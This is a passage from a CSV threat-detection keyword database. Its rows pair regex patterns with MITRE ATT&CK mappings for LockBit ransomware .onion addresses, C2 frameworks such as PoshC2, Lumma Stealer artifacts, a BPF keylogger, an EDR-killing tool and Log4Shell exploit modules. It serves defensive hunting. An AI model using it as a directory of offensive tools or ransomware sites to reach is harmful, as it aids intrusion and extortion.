archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51257" 
"*lockbit3olp7oetlc4tl5zydnoluphh7fvdt5oa6arcp2757r7xkutid.onion*",".{0,1000}lockbit3olp7oetlc4tl5zydnoluphh7fvdt5oa6arcp2757r7xkutid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51258" "*lockbit435xk3ki62yun7z5nhwz6jyjdp2c64j5vge536if2eny3gtid.onion*",".{0,1000}lockbit435xk3ki62yun7z5nhwz6jyjdp2c64j5vge536if2eny3gtid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51259" "*lockbit4lahhluquhoka3t4spqym2m3dhe66d6lr337glmnlgg2nndad.onion*",".{0,1000}lockbit4lahhluquhoka3t4spqym2m3dhe66d6lr337glmnlgg2nndad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51260" "*lockbit5eevg7vec4vwwtzgkl4kulap6oxbic2ye4mnmlq6njnpc47qd.onion*",".{0,1000}lockbit5eevg7vec4vwwtzgkl4kulap6oxbic2ye4mnmlq6njnpc47qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51261" "*lockbit6knrauo3qafoksvl742vieqbujxw7rd6ofzdtapjb4rrawqad.onion*",".{0,1000}lockbit6knrauo3qafoksvl742vieqbujxw7rd6ofzdtapjb4rrawqad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware 
notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51262" "*lockbit74beza5z3e3so7qmjnvlgoemscp7wtp33xo7xv7f7xtlqbkqd.onion*",".{0,1000}lockbit74beza5z3e3so7qmjnvlgoemscp7wtp33xo7xv7f7xtlqbkqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51263" "*lockbit75naln4yj44rg6ez6vjmdcrt7up4kxmmmuvilcg4ak3zihxid.onion*",".{0,1000}lockbit75naln4yj44rg6ez6vjmdcrt7up4kxmmmuvilcg4ak3zihxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51264" "*lockbit7a2g6ve7etbcy6iyizjnuleffz4szgmxaawcbfauluavi5jqd.onion*",".{0,1000}lockbit7a2g6ve7etbcy6iyizjnuleffz4szgmxaawcbfauluavi5jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51265" "*lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd.onion*",".{0,1000}lockbit7ouvrsdgtojeoj5hvu6bljqtghitekwpdy3b6y62ixtsu5jqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51266" 
"*lockbitaa46gwjck2xzmi2xops6x4x3aqn6ez7yntitero2k7ae6yoyd.onion*",".{0,1000}lockbitaa46gwjck2xzmi2xops6x4x3aqn6ez7yntitero2k7ae6yoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51267" "*lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion*",".{0,1000}lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51268" "*lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion.ly*",".{0,1000}lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51269" "*lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion*",".{0,1000}lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51270" "*lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly*",".{0,1000}lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved 
in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51271" "*lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion*",".{0,1000}lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51272" "*lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly*",".{0,1000}lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51273" "*lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion*",".{0,1000}lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51274" "*lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly*",".{0,1000}lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51275" 
"*lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion*",".{0,1000}lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51276" "*lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly*",".{0,1000}lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51277" "*lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion*",".{0,1000}lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51278" "*lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion.ly*",".{0,1000}lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51279" "*lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion*",".{0,1000}lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved 
in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51280" "*lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion.ly*",".{0,1000}lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51281" "*lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion*",".{0,1000}lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51282" "*lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion.ly*",".{0,1000}lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51283" "*lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion*",".{0,1000}lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51284" 
"*lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly*",".{0,1000}lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51285" "*lockbitb42tkml3ipianjbs6e33vhcshb7oxm2stubfvdzn3y2yqgbad.onion*",".{0,1000}lockbitb42tkml3ipianjbs6e33vhcshb7oxm2stubfvdzn3y2yqgbad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51286" "*lockbitcuo23q7qrymbk6dsp2sadltspjvjxgcyp4elbnbr6tcnwq7qd.onion*",".{0,1000}lockbitcuo23q7qrymbk6dsp2sadltspjvjxgcyp4elbnbr6tcnwq7qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51287" "*lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion*",".{0,1000}lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51288" "*lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion*",".{0,1000}lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in 
ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51289" "*lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion*",".{0,1000}lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51290" "*lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd.onion*",".{0,1000}lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51291" "*lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion*",".{0,1000}lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51292" "*lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad.onion*",".{0,1000}lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51293" 
"*lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd.onion*",".{0,1000}lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51294" "*lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd.onion*",".{0,1000}lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51295" "*lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion*",".{0,1000}lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51296" "*lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion*",".{0,1000}lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51297" "*lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onion*",".{0,1000}lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware 
notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51298" "*lockless *.dat*",".{0,1000}lockless\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51299" "*LockLess.exe */copy*",".{0,1000}LockLess\.exe\s.{0,1000}\/copy.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","51300" "*LockLess.exe all*",".{0,1000}LockLess\.exe\sall.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","51301" "*LockLess.exe*",".{0,1000}LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","51302" "*Locksmith-main.zip*",".{0,1000}Locksmith\-main\.zip.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","51303" "*Loedx765gin Daedx765ta*",".{0,1000}Loedx765gin\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51314" "*log4_shell.rb*",".{0,1000}log4_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51315" "*log4shell*.nessus.org*",".{0,1000}log4shell.{0,1000}\.nessus\.org.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","51316" "*log4shell.py*",".{0,1000}log4shell\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","51317" "*log4shell-scanner.jar*",".{0,1000}log4shell\-scanner\.jar.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation 
tool","https://github.com/silentsignal/burp-log4shell","1","1","N/A","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","51318" "*logangoins/Cable*",".{0,1000}logangoins\/Cable.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","1","N/A","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","51319" "*logangoins/Krueger*",".{0,1000}logangoins\/Krueger.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","51320" "*logangoins/Stifle*",".{0,1000}logangoins\/Stifle.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","1","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","51321" "*Logedx765in Daedx765ta Foedx765r Accedx765ount*",".{0,1000}Logedx765in\sDaedx765ta\sFoedx765r\sAccedx765ount.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51322" "*Logging key presses... 
ctrl-c to quit*",".{0,1000}Logging\skey\spresses\.\.\.\sctrl\-c\sto\squit.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","51323" "*logging.getLogger(""nemesis"")*",".{0,1000}logging\.getLogger\(\""nemesis\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","51324" "*LoGiC.NET.exe*",".{0,1000}LoGiC\.NET\.exe.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","6","513","80","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z","51325" "*login.php?LOGMEOUTPLZ=true*",".{0,1000}login\.php\?LOGMEOUTPLZ\=true.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 